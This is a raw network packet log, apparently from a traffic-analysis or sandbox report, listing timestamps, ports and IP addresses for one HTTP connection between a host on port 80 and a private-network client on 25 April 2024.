Apr 25, 2024 12:16:11.048643112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048669100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048716068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048768997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048783064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048795938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048808098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048820972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048834085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048851013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048851013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048901081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048935890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048949003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048962116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048974991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048988104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049007893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049020052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049119949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049134016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049145937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049159050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049171925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049184084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049196959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049233913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049287081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049299955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049312115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049324989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049338102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049345016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049381018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049469948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049483061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049494982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049509048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049521923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049525976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049535036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049540997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049549103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049562931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049566984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049576044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049613953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049613953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049721956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049736023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049747944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049763918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049813986 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049813986 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049895048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049907923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049920082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049933910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049947023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049959898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049968004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049968004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.049973011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.049995899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050076962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050091028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050106049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050118923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050138950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050159931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050265074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050278902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050292015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050304890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050318003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050328016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050331116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050362110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050362110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050448895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050462961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050476074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050487041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050499916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050503016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050513983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050534964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050553083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050615072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050627947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050640106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050652981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050666094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050678968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050693035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050694942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050694942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050745010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050745010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050790071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050803900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050817013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050829887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050879002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050879002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.050968885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050982952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.050997019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051009893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051023006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051032066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051062107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051136017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051148891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051162004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051177025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051189899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051192045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051214933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051234961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051321983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051336050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051348925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051362038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051374912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051388025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051400900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051400900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051444054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051575899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051593065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051604986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051616907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051630974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051642895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051665068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051665068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051703930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051738024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051753044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051805019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.051911116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051923990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051935911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051948071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051960945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.051978111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052066088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052084923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052103043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052117109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052129030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052140951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052155018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052154064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052167892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052181005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052186966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052194118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052212954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052212954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052215099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052253008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052284956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052298069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052340984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052472115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052484035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052495956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052509069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052653074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052659988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052671909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052684069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052695990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052714109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052727938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052730083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052730083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052742004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052764893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052784920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052828074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052840948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052851915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052871943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052885056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052898884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.052903891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052903891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052974939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.052990913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053004026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053016901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053030014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053039074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053042889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053091049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053174973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053188086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053200960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053214073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053226948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053240061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053252935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053318977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053318977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053318977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053318977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053329945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053344011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053356886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053425074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053504944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053518057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053530931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053543091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053555965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053585052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053585052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053661108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053673983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053675890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053687096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053699017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053713083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053725004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053735971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053735971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053790092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053822041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053836107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053848028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053865910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053879023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.053900003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053900003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.053993940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054007053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054018974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054032087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054056883 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054173946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054187059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054199934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054213047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054214954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054224968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054228067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054259062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054286003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054347038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054359913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054372072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054383993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054398060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054416895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054416895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054493904 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054516077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054528952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054541111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054553032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054565907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054578066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054595947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054595947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054639101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054696083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054709911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054723024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054737091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054749966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054757118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054884911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054898977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054912090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.054919004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054919004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054935932 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.054969072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055077076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055090904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055103064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055115938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055128098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055140018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055151939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055155039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055155039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055155039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055164099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055198908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055198908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055222034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055248976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055399895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055412054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055424929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055438042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055449009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055458069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055461884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055490971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055490971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055548906 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055553913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055567980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055579901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055593014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055605888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055619001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055619955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055656910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055682898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055733919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055747032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055759907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055773973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055782080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055823088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055823088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.055924892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055938005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055952072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055963039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055975914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055989027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.055993080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.056005955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.056080103 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.056106091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.056118965 CEST	80	49733	176.97.76.106	192.168.2.4
